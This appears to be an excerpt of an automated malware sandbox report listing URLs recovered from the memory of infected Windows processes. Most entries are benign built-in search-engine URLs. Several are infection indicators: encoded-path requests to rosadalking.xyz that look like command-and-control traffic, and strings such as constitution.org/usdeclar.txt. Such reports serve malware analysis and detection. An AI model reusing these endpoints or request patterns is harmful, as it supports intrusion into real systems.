Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 5fd9d7ec9e7aetar.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 5fd9d7ec9e7aetar.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?aa4ec0d4b8242
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: ~DF224E930954C99BCE.TMP.4.dr, {CB1D97FB-3FD1-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://firestore.googleapis.com/images/5gl1_2BhlXsWr7coQSs/4F845jkaqRiUCXeQicZCJl/ANd4nGixTqMmg/W9Sd
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: 5fd9d7ec9e7aetar.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: imagestore.dat.21.dr	String found in binary or memory: http://rosadalking.xyz/favicon.ico
Source: imagestore.dat.21.dr	String found in binary or memory: http://rosadalking.xyz/favicon.ico~
Source: {F0C73B59-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr	String found in binary or memory: http://rosadalking.xyz/images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDs
Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmp	String found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8
Source: {F0C73B5B-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr	String found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9
Source: loaddll32.exe, 00000000.00000003.375700561.00000000015B7000.00000004.00000001.sdmp, explorer.exe, 00000025.00000000.449476273.0000000005509000.00000004.00000001.sdmp, ~DF907A0632D9B8351A.TMP.21.dr, {F0C73B57-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.dr	String found in binary or memory: http://rosadalking.xyz/images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/x
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001C.00000002.476825064.00000224909E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.4.dr	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
